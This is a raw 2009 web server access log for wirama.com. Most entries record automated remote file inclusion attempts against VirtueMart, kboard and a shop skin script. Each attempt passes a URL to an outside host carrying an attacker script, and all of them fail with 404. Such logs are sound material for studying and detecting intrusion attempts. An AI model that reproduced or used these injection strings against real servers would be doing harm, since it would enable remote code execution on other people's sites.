124.0.139.129 - - [01/Jul/2009:17:40:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:40:20 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:40:25 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:40:43 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:40:45 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:42:30 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:44:23 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:17:44:30 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:17:44:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:17:44:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:17:44:33 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:17:44:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:17:49:36 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:49:41 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:58:40 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:58:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:58:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:59:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:59:35 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:17:59:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:18:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:18:43 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:18:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:18:54 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:18:54 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:18:54 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:24:10 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.131.106.14 - - [01/Jul/2009:18:24:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
88.131.106.14 - - [01/Jul/2009:18:24:19 -0700] "GET / HTTP/1.0" 200 900 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:24:36 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:25:11 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:25:31 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:18:36:46 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
83.98.209.71 - - [01/Jul/2009:18:36:46 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
83.98.209.71 - - [01/Jul/2009:18:36:46 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
83.98.209.71 - - [01/Jul/2009:18:36:50 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:18:36:50 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:18:36:50 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:18:37:05 -0700] "GET /logs/access_090601.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:18:38:36 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
122.153.28.140 - - [01/Jul/2009:18:39:06 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:39:10 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:39:10 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:39:16 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:39:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:39:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:39:38 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:39:38 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:39:41 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:39:47 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:39:47 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:39:47 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:18:40:02 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.170 - - [01/Jul/2009:18:40:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:40:26 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:40:28 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:18:40:35 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:18:41:13 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:18:41:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [01/Jul/2009:18:41:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.125.38.117 - - [01/Jul/2009:18:42:35 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.125.38.117 - - [01/Jul/2009:18:42:35 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.125.38.117 - - [01/Jul/2009:18:42:36 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.125.38.117 - - [01/Jul/2009:18:42:45 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:18:42:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:42:59 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:42:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:43:06 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:43:06 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:43:06 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:43:38 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:43:38 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:43:38 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:43:42 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:43:42 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:43:42 -0700] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:18:44:39 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:45:16 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:45:19 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:46:56 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:18:47:00 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:47:56 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:47:56 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:47:56 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:48:06 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:48:06 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:48:06 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:48:27 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:18:48:27 -0700] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:18:48:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:48:49 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:48:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:48:54 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:48:54 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
